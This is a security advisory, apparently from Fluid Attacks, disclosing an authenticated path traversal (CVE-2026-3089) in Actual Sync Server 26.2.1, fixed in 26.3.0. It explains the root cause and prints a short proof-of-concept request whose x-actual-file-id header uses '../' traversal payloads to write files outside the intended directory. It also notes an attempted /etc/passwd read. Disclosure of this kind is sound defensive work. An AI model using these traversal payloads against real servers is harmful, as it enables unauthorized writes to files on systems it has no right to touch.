

Advisories

Actual Sync Server 26.2.1 - Authenticated Path Traversal

5,3

Medium

Discovered by

Juan Patarroyo

External researcher

Summary

Full name

Actual Sync Server 26.2.1 - Authenticated Path Traversal

Code name

fugue

State

Public

Release date

9 mar 2026

Affected product

Actual Sync Server

Vendor

Actual Budget

Affected version(s)

26.2.1

Fixed version(s)

26.3.0

Package manager

npm

Vulnerability name

Lack of data validation - Path Traversal

Vulnerability type

063. Lack of data validation - Path Traversal

Remotely exploitable

Yes

CVSS v4.0 vector string

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N

CVSS v4.0 base score

5.3

Exploit available

Yes

CVE ID(s)

CVE-2026-3089

Description

Actual Sync Server allows authenticated users to upload files through POST /sync/upload-user-file.
The server builds a filesystem path using user-controlled x-actual-file-id in:
join(resolve(config.get('userFiles')), 'file-${fileId}.blob').
Because fileId is not validated with a strict allowlist and there is no canonical boundary validation, traversal segments (../) can escape the intended directory and write files outside userFiles.

Vulnerability

The affected endpoint is POST /sync/upload-user-file, where user-controlled x-actual-file-id is used to construct filesystem paths without strict allowlist validation or canonical boundary enforcement, enabling traversal-based writes outside the intended directory. A secondary weakness exists in GET /sync/download-user-file, which relies on startsWith(resolve(config.get('userFiles'))) for path validation and can be bypassed with sibling-prefix paths such as /data/user-files2. The root cause is implemented in actual/packages/sync-server/src/util/paths.js and actual/packages/sync-server/src/app-sync.ts.

PoC

Request:
POST /sync/upload-user-file
Headers:

x-actual-token: <valid token>
x-actual-name: poc
x-actual-file-id: ../../../server-files/pwned-traversal
Content-Type: application/encrypted-file
Body:
poc-content

Observed result:

/data/server-files/pwned-traversal.blob is created outside the intended user files directory.

Additional payload:

x-actual-file-id: ../../../../tmp/outside-actual-data
Observed result:
/tmp/outside-actual-data.blob is created.

Evidence of Exploitation

Successful write with crafted header x-actual-file-id: ../../../server-files/pwned-traversal.

File created at /data/server-files/pwned-traversal.blob.
Successful write outside /data at /tmp/outside-actual-data.blob.
Attempting direct read of /etc/passwd via this vector does not yield raw /etc/passwd; the resolved target becomes /etc/passwd.blob.

File creation evidence

Our security policy

We have reserved the ID CVE-2026-3089 to refer to this issue from now on.

Disclosure policy

System Information

Actual Sync Server
Version: 26.2.1
Operating System: Any

References

Product: https://github.com/actualbudget/actual
Security: https://github.com/actualbudget/actual/security
Patch: https://github.com/actualbudget/actual/pull/7067

Mitigation

An updated version of Actual Sync Server is available at the vendor page.

Credits

The vulnerability was discovered by Juan Patarroyo from Fluid Attacks' Offensive Team.

Timeline



20 feb 2026

Vulnerability discovered



23 feb 2026

Vendor contacted



24 mar 2026

Vendor replied



24 feb 2026

Vendor confirmed



24 feb 2026

Vulnerability patched



9 mar 2026

Public disclosure

Does your application use this vulnerable software?

During our free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.

Start free trial

Las soluciones de Fluid Attacks permiten a las organizaciones identificar, priorizar y remediar vulnerabilidades en su software a lo largo del SDLC. Con el apoyo de la IA, herramientas automatizadas y pentesters, Fluid Attacks acelera la mitigación de la exposición al riesgo de las empresas y fortalece su postura de ciberseguridad.

Lee un resumen de Fluid Attacks